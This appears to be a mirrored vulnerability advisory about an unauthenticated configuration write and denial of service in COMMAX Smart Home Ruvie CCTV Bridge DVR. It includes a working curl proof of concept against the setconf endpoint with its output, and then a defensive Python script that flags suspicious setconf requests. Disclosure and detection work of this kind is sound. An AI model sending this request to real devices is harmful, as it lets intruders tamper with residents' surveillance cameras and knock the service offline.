## https://sploitus.com/exploit?id=ZSL-2021-5666
COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS


Vendor: COMMAX Co., Ltd.
Product web page: https://www.commax.com
Affected version: n/a

Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.

Desc: The application allows an unauthenticated attacker to change the configuration
of the DVR arguments and/or cause a denial-of-service scenario through the setconf endpoint.

Tested on: GoAhead-Webs


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5666
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php


02.08.2021

--


#1

$ curl -X POST http://192.168.1.1:8086/goform/setconf --data "manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&dvr1=&dvr2=&dvr3=&dvr4=&dvr5=&dvr6=&dvr7=&dvr8=&dvr9=&dvr10=&dvr11=&dvr12=&dvr13=&dvr14=&dvr15=&dvr16=&dvr17=&dvr18=&dvr19=&dvr20=&dvr21=&dvr22=&dvr23=&ok=OK"

*   Trying 192.168.1.1...
* TCP_NODELAY set
* Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0)
> POST /goform/setconf HTTP/1.1
> Host: 192.168.1.1:8086
> User-Agent: curl/7.55.1
> Accept: */*
> Content-Length: 257
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 257 out of 257 bytes
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: GoAhead-Webs
< Pragma: no-cache
< Cache-control: no-cache
< Content-Type: text/html
<

<br/><br/><center><table><tr><td>Completed to change configuration! Restart in 10 seconds</td></tr></table></center></body></html>
* Closing connection 0

#2

$ curl -v http://192.168.1.1:8086
* Rebuilt URL to: http://192.168.1.1:8086/
*   Trying 192.168.1.1...
* TCP_NODELAY set
* connect to 192.168.1.1 port 8086 failed: Connection refused
* Failed to connect to 192.168.1.1 port 8086: Connection refused
* Closing connection 0
curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused
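
A defender-side check for the issue described in this advisory, added here as an example (it is not code from the advisory or from COMMAX): it reviews captured requests for writes to /goform/setconf and flags dvrN stream URLs that point outside the camera network. The subnet, the admin host, the record layout and the sample traffic are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import parse_qsl, urlsplit

# Assumptions for this sketch: cameras live on this subnet and only this
# management host is expected to submit configuration changes.
CAMERA_NETS = [ipaddress.ip_network("192.168.1.0/24")]
ADMIN_HOSTS = {"192.168.1.10"}

def audit_setconf_body(body, camera_nets=CAMERA_NETS):
    """Return (field, reason) findings for one urlencoded setconf body."""
    findings = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        if not (key.startswith("dvr") and key[3:].isdigit() and value):
            continue  # only populated dvrN stream arguments are of interest
        url = urlsplit(value)
        if url.scheme.lower() != "rtsp":
            findings.append((key, "unexpected scheme"))
            continue
        if url.username or url.password:
            findings.append((key, "credentials embedded in stream URL"))
        try:
            inside = any(ipaddress.ip_address(url.hostname or "") in n
                         for n in camera_nets)
        except ValueError:  # a DNS name rather than an IP literal
            inside = False
        if not inside:
            findings.append((key, "stream host outside camera networks"))
    return findings

def review_requests(records, admin_hosts=ADMIN_HOSTS):
    """records: iterable of (src_ip, method, path, body) from a proxy or capture."""
    alerts = []
    for src, method, path, body in records:
        if method == "POST" and path.split("?")[0] == "/goform/setconf":
            reasons = audit_setconf_body(body)
            if src not in admin_hosts:
                reasons.insert(0, ("source", "setconf write from non-admin host"))
            if reasons:
                alerts.append((src, reasons))
    return alerts

# Constructed sample traffic (not taken from a real device).
SAMPLE = [
    ("192.168.1.10", "POST", "/goform/setconf",
     "manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2F192.168.1.50%3A554%2FStream%2FCh01&dvr1=&ok=OK"),
    ("192.168.1.77", "POST", "/goform/setconf",
     "manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2Fadmin%3Asecret%40cam.example.net%3A554%2FStream%2FCh01&ok=OK"),
    ("192.168.1.77", "GET", "/", ""),
]
```

Because the endpoint accepts writes without authentication, the source-address check is only a network-layer heuristic; restricting access to port 8086 to the management host is the control it assumes.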